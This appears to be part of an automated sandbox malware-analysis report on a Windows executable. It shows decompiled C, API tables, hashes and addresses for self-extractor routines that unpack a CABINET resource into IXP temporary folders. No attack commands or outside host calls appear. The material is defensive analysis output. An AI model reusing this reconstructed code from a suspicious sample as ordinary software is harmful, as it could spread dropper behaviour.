                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t111;
                                                                                                                                                                                                                                              						if(_t111 == 0) {
                                                                                                                                                                                                                                              							_t101 = _t101 - 1;
                                                                                                                                                                                                                                              							__eflags = _t101;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *_t101 = 0;
                                                                                                                                                                                                                                              						_t112 = 0x200;
                                                                                                                                                                                                                                              						_t102 = _v812;
                                                                                                                                                                                                                                              						_t78 = 0;
                                                                                                                                                                                                                                              						_t118 = 8;
                                                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                                                              							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                              							if(_t102 == _t112) {
                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                              							_t78 = _t78 + 1;
                                                                                                                                                                                                                                              							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                              							if(_t78 < _t118) {
                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                              						if(_t78 != _t118) {
                                                                                                                                                                                                                                              							__eflags =  *0xa89a34 & 0x00000008;
                                                                                                                                                                                                                                              							if(( *0xa89a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                              								L20:
                                                                                                                                                                                                                                              								_t103 =  *0xa89a38; // 0x0
                                                                                                                                                                                                                                              								_t110 =  *((intOrPtr*)(0xa889e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                              								L21:
                                                                                                                                                                                                                                              								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                              								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                              									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                              									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								if(__eflags <= 0) {
                                                                                                                                                                                                                                              									 *0xa89124 = 0;
                                                                                                                                                                                                                                              									_t66 = 1;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t66 = E00A8268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                              							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t105 =  *0xa89a38; // 0x0
                                                                                                                                                                                                                                              							_t110 =  *((intOrPtr*)(0xa889e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa889e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                              							_t103 = (_t105 >> 2) +  *0xa89a38;
                                                                                                                                                                                                                                              							goto L21;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t110 = 0x4c5;
                                                                                                                                                                                                                                              						E00A844B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						goto L31;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                              					 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                              					_t110 = 0x4f9;
                                                                                                                                                                                                                                              					goto L30;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t110 = 0x4bc;
                                                                                                                                                                                                                                              					E00A844B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              					_t66 = 0;
                                                                                                                                                                                                                                              					L33:
                                                                                                                                                                                                                                              					return E00A86CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}



































                                                                                                                                                                                                                                              0x00a8597d
                                                                                                                                                                                                                                              0x00a85988
                                                                                                                                                                                                                                              0x00a8598f
                                                                                                                                                                                                                                              0x00a8599a
                                                                                                                                                                                                                                              0x00a859a6
                                                                                                                                                                                                                                              0x00a859a8
                                                                                                                                                                                                                                              0x00a859af
                                                                                                                                                                                                                                              0x00a859b9
                                                                                                                                                                                                                                              0x00a859dd
                                                                                                                                                                                                                                              0x00a859e4
                                                                                                                                                                                                                                              0x00a859f1
                                                                                                                                                                                                                                              0x00a859fe
                                                                                                                                                                                                                                              0x00a85a0b
                                                                                                                                                                                                                                              0x00a85a13
                                                                                                                                                                                                                                              0x00a85a19
                                                                                                                                                                                                                                              0x00a85a1b
                                                                                                                                                                                                                                              0x00a85ba1
                                                                                                                                                                                                                                              0x00a85baf
                                                                                                                                                                                                                                              0x00a85bbd
                                                                                                                                                                                                                                              0x00a85bd8
                                                                                                                                                                                                                                              0x00a85bde
                                                                                                                                                                                                                                              0x00a85be3
                                                                                                                                                                                                                                              0x00a85bec
                                                                                                                                                                                                                                              0x00a85bf0
                                                                                                                                                                                                                                              0x00a85bfc
                                                                                                                                                                                                                                              0x00a85c02
                                                                                                                                                                                                                                              0x00a85c02
                                                                                                                                                                                                                                              0x00a85c02
                                                                                                                                                                                                                                              0x00a85c04
                                                                                                                                                                                                                                              0x00a85c04
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85c04
                                                                                                                                                                                                                                              0x00a85a27
                                                                                                                                                                                                                                              0x00a85a3a
                                                                                                                                                                                                                                              0x00a85a46
                                                                                                                                                                                                                                              0x00a85a48
                                                                                                                                                                                                                                              0x00a85a4a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85a64
                                                                                                                                                                                                                                              0x00a85a6a
                                                                                                                                                                                                                                              0x00a85a6c
                                                                                                                                                                                                                                              0x00a85abc
                                                                                                                                                                                                                                              0x00a85ac2
                                                                                                                                                                                                                                              0x00a85ac9
                                                                                                                                                                                                                                              0x00a85aca
                                                                                                                                                                                                                                              0x00a85aca
                                                                                                                                                                                                                                              0x00a85acc
                                                                                                                                                                                                                                              0x00a85acc
                                                                                                                                                                                                                                              0x00a85acf
                                                                                                                                                                                                                                              0x00a85ad1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85ad3
                                                                                                                                                                                                                                              0x00a85ad6
                                                                                                                                                                                                                                              0x00a85ad8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85ada
                                                                                                                                                                                                                                              0x00a85adc
                                                                                                                                                                                                                                              0x00a85add
                                                                                                                                                                                                                                              0x00a85add
                                                                                                                                                                                                                                              0x00a85ae0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85ae0
                                                                                                                                                                                                                                              0x00a85ae2
                                                                                                                                                                                                                                              0x00a85ae4
                                                                                                                                                                                                                                              0x00a85ae6
                                                                                                                                                                                                                                              0x00a85ae6
                                                                                                                                                                                                                                              0x00a85ae6
                                                                                                                                                                                                                                              0x00a85ae9
                                                                                                                                                                                                                                              0x00a85aeb
                                                                                                                                                                                                                                              0x00a85af0
                                                                                                                                                                                                                                              0x00a85af6
                                                                                                                                                                                                                                              0x00a85af8
                                                                                                                                                                                                                                              0x00a85af9
                                                                                                                                                                                                                                              0x00a85af9
                                                                                                                                                                                                                                              0x00a85afb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85afd
                                                                                                                                                                                                                                              0x00a85aff
                                                                                                                                                                                                                                              0x00a85b00
                                                                                                                                                                                                                                              0x00a85b03
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85b03
                                                                                                                                                                                                                                              0x00a85b05
                                                                                                                                                                                                                                              0x00a85b08
                                                                                                                                                                                                                                              0x00a85b20
                                                                                                                                                                                                                                              0x00a85b27
                                                                                                                                                                                                                                              0x00a85b52
                                                                                                                                                                                                                                              0x00a85b52
                                                                                                                                                                                                                                              0x00a85b5b
                                                                                                                                                                                                                                              0x00a85b62
                                                                                                                                                                                                                                              0x00a85b6b
                                                                                                                                                                                                                                              0x00a85b6d
                                                                                                                                                                                                                                              0x00a85b76
                                                                                                                                                                                                                                              0x00a85b7d
                                                                                                                                                                                                                                              0x00a85b83
                                                                                                                                                                                                                                              0x00a85b7f
                                                                                                                                                                                                                                              0x00a85b7f
                                                                                                                                                                                                                                              0x00a85b7f
                                                                                                                                                                                                                                              0x00a85b6f
                                                                                                                                                                                                                                              0x00a85b72
                                                                                                                                                                                                                                              0x00a85b72
                                                                                                                                                                                                                                              0x00a85b85
                                                                                                                                                                                                                                              0x00a85b98
                                                                                                                                                                                                                                              0x00a85b9e
                                                                                                                                                                                                                                              0x00a85b87
                                                                                                                                                                                                                                              0x00a85b8f
                                                                                                                                                                                                                                              0x00a85b8f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85b85
                                                                                                                                                                                                                                              0x00a85b29
                                                                                                                                                                                                                                              0x00a85b33
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85b35
                                                                                                                                                                                                                                              0x00a85b48
                                                                                                                                                                                                                                              0x00a85b4a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85b4a
                                                                                                                                                                                                                                              0x00a85b0f
                                                                                                                                                                                                                                              0x00a85b16
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85b16
                                                                                                                                                                                                                                              0x00a85a7c
                                                                                                                                                                                                                                              0x00a85a8a
                                                                                                                                                                                                                                              0x00a85aa5
                                                                                                                                                                                                                                              0x00a85aab
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a859bb
                                                                                                                                                                                                                                              0x00a859c0
                                                                                                                                                                                                                                              0x00a859c7
                                                                                                                                                                                                                                              0x00a859d1
                                                                                                                                                                                                                                              0x00a859d6
                                                                                                                                                                                                                                              0x00a85c05
                                                                                                                                                                                                                                              0x00a85c14
                                                                                                                                                                                                                                              0x00a85c14

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A859A8
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A859AF
                                                                                                                                                                                                                                              • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A85A13
                                                                                                                                                                                                                                              • MulDiv.KERNEL32(?,?,00000400), ref: 00A85A40
                                                                                                                                                                                                                                              • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A85A64
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A85A7C
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A85A98
                                                                                                                                                                                                                                              • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A85AA5
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A85BFC
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                                • Part of subcall function 00A86285: GetLastError.KERNEL32(00A85BBC), ref: 00A86285
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4237285672-0
                                                                                                                                                                                                                                              • Opcode ID: 8c6ed638ac91d78e97197e2be8876ab74b856d41cf50f599b4c9bc35e4678c82
                                                                                                                                                                                                                                              • Instruction ID: 8d80def161900bf2638d48e9e9f617413607801fd74af1f1065c2eae483bcdaa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c6ed638ac91d78e97197e2be8876ab74b856d41cf50f599b4c9bc35e4678c82
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B7195B1D0020C9FEB15EBA4CC89BFB77BCEB58344F5441AAF90596140EA349E458B21
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 374 a84fe0-a8501a call a8468f FindResourceA LoadResource LockResource 377 a85020-a85027 374->377 378 a85161-a85163 374->378 379 a85029-a85051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 a85057-a8505e call a84efd 377->380 379->380 383 a8507c-a850b4 380->383 384 a85060-a85077 call a844b9 380->384 389 a850e8-a85104 call a844b9 383->389 390 a850b6-a850da 383->390 388 a85107-a8510e 384->388 391 a8511d-a8511f 388->391 392 a85110-a85117 FreeResource 388->392 398 a85106 389->398 390->398 402 a850dc 390->402 395 a8513a-a85141 391->395 396 a85121-a85127 391->396 392->391 400 a8515f 395->400 401 a85143-a8514a 395->401 396->395 399 a85129-a85135 call a844b9 396->399 398->388 399->395 400->378 401->400 404 a8514c-a85159 SendMessageA 401->404 405 a850e3-a850e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                                                                              			E00A84FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                                                                              				struct HWND__* _t9;
                                                                                                                                                                                                                                              				int _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				struct HWND__* _t24;
                                                                                                                                                                                                                                              				struct HWND__* _t27;
                                                                                                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                                                                              				int _t34;
                                                                                                                                                                                                                                              				CHAR* _t36;
                                                                                                                                                                                                                                              				int _t37;
                                                                                                                                                                                                                                              				intOrPtr _t47;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __edi;
                                                                                                                                                                                                                                              				_t36 = "CABINET";
                                                                                                                                                                                                                                              				 *0xa89144 = E00A8468F(_t36, 0, 0);
                                                                                                                                                                                                                                              				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                              				 *0xa89140 = _t8;
                                                                                                                                                                                                                                              				if(_t8 == 0) {
                                                                                                                                                                                                                                              					return _t8;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t9 =  *0xa88584; // 0x0
                                                                                                                                                                                                                                              				if(_t9 != 0) {
                                                                                                                                                                                                                                              					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                              					ShowWindow(GetDlgItem( *0xa88584, 0x841), 5); // executed
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t10 = E00A84EFD(0, 0); // executed
                                                                                                                                                                                                                                              				if(_t10 != 0) {
                                                                                                                                                                                                                                              					__imp__#20(E00A84CA0, E00A84CC0, E00A84980, E00A84A50, E00A84AD0, E00A84B60, E00A84BC0, 1, 0xa89148, _t33);
                                                                                                                                                                                                                                              					_t34 = _t10;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						L8:
                                                                                                                                                                                                                                              						_t29 =  *0xa89148; // 0x0
                                                                                                                                                                                                                                              						_t24 =  *0xa88584; // 0x0
                                                                                                                                                                                                                                              						E00A844B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_t37 = 0;
                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__#22(_t34, "*MEMCAB", 0xa81140, 0, E00A84CD0, 0, 0xa89140); // executed
                                                                                                                                                                                                                                              					_t37 = _t10;
                                                                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                              					if(_t10 != 0) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L8;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t27 =  *0xa88584; // 0x0
                                                                                                                                                                                                                                              					E00A844B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					_t37 = 0;
                                                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                                                              					_t12 =  *0xa89140; // 0x0
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						FreeResource(_t12);
                                                                                                                                                                                                                                              						 *0xa89140 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                                                                              						_t47 =  *0xa891d8; // 0x0
                                                                                                                                                                                                                                              						if(_t47 == 0) {
                                                                                                                                                                                                                                              							E00A844B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(( *0xa88a38 & 0x00000001) == 0 && ( *0xa89a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              						SendMessageA( *0xa88584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return _t37;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}
















                                                                                                                                                                                                                                              0x00a84fe0
                                                                                                                                                                                                                                              0x00a84fe6
                                                                                                                                                                                                                                              0x00a84ff9
                                                                                                                                                                                                                                              0x00a8500d
                                                                                                                                                                                                                                              0x00a85013
                                                                                                                                                                                                                                              0x00a8501a
                                                                                                                                                                                                                                              0x00a85163
                                                                                                                                                                                                                                              0x00a85163
                                                                                                                                                                                                                                              0x00a85020
                                                                                                                                                                                                                                              0x00a85027
                                                                                                                                                                                                                                              0x00a85037
                                                                                                                                                                                                                                              0x00a85051
                                                                                                                                                                                                                                              0x00a85051
                                                                                                                                                                                                                                              0x00a85057
                                                                                                                                                                                                                                              0x00a8505e
                                                                                                                                                                                                                                              0x00a850a7
                                                                                                                                                                                                                                              0x00a850ad
                                                                                                                                                                                                                                              0x00a850b4
                                                                                                                                                                                                                                              0x00a850e8
                                                                                                                                                                                                                                              0x00a850e8
                                                                                                                                                                                                                                              0x00a850ee
                                                                                                                                                                                                                                              0x00a850ff
                                                                                                                                                                                                                                              0x00a85104
                                                                                                                                                                                                                                              0x00a85106
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85106
                                                                                                                                                                                                                                              0x00a850cd
                                                                                                                                                                                                                                              0x00a850d3
                                                                                                                                                                                                                                              0x00a850da
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a850dd
                                                                                                                                                                                                                                              0x00a850e6
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85060
                                                                                                                                                                                                                                              0x00a85060
                                                                                                                                                                                                                                              0x00a85070
                                                                                                                                                                                                                                              0x00a85075
                                                                                                                                                                                                                                              0x00a85107
                                                                                                                                                                                                                                              0x00a85107
                                                                                                                                                                                                                                              0x00a8510e
                                                                                                                                                                                                                                              0x00a85111
                                                                                                                                                                                                                                              0x00a85117
                                                                                                                                                                                                                                              0x00a85117
                                                                                                                                                                                                                                              0x00a8511f
                                                                                                                                                                                                                                              0x00a85121
                                                                                                                                                                                                                                              0x00a85127
                                                                                                                                                                                                                                              0x00a85135
                                                                                                                                                                                                                                              0x00a85135
                                                                                                                                                                                                                                              0x00a85127
                                                                                                                                                                                                                                              0x00a85141
                                                                                                                                                                                                                                              0x00a85159
                                                                                                                                                                                                                                              0x00a85159
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8515f

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A84FFE
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00A85006
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 00A8500D
                                                                                                                                                                                                                                              • GetDlgItem.USER32(00000000,00000842), ref: 00A85030
                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00A85037
                                                                                                                                                                                                                                              • GetDlgItem.USER32(00000841,00000005), ref: 00A8504A
                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00A85051
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A85111
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A85159
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                              • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                              • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                              • Opcode ID: f11bcdcee71ff671ea1dc0eca6f079209b51ac316e6b4b1334fd2ccf60b22397
                                                                                                                                                                                                                                              • Instruction ID: c9b6356bb702ce2c9d9c1c0235dad055bd13899198c35f70ef210362da579c0f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f11bcdcee71ff671ea1dc0eca6f079209b51ac316e6b4b1334fd2ccf60b22397
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5631C9B0B807027BE720FBE1AD8DF6736ADB718B55F040615FD06A62A1EA788C028751
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E00A853A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                                                                              				long _t13;
                                                                                                                                                                                                                                              				int _t14;
                                                                                                                                                                                                                                              				CHAR* _t20;
                                                                                                                                                                                                                                              				int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				CHAR* _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t5 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                              				_t32 = __edx;
                                                                                                                                                                                                                                              				_t20 = __ecx;
                                                                                                                                                                                                                                              				_t29 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					E00A8171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                              					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                              					_t29 = _t29 + 1;
                                                                                                                                                                                                                                              					E00A81680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                              					E00A8658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                              					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                              					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                              					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t29 < 0x190) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                                                              					_t30 = 0;
                                                                                                                                                                                                                                              					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                              						_t30 = 1;
                                                                                                                                                                                                                                              						DeleteFileA(_t32);
                                                                                                                                                                                                                                              						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                              					return E00A86CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                              				if(_t14 == 0) {
                                                                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t30 = 1;
                                                                                                                                                                                                                                              				 *0xa88a20 = 1;
                                                                                                                                                                                                                                              				goto L5;
                                                                                                                                                                                                                                              			}

















                                                                                                                                                                                                                                              0x00a853ac
                                                                                                                                                                                                                                              0x00a853b3
                                                                                                                                                                                                                                              0x00a853b9
                                                                                                                                                                                                                                              0x00a853bb
                                                                                                                                                                                                                                              0x00a853bd
                                                                                                                                                                                                                                              0x00a853bf
                                                                                                                                                                                                                                              0x00a853d1
                                                                                                                                                                                                                                              0x00a853d6
                                                                                                                                                                                                                                              0x00a853e0
                                                                                                                                                                                                                                              0x00a853e2
                                                                                                                                                                                                                                              0x00a853f5
                                                                                                                                                                                                                                              0x00a853fb
                                                                                                                                                                                                                                              0x00a85402
                                                                                                                                                                                                                                              0x00a8540b
                                                                                                                                                                                                                                              0x00000000
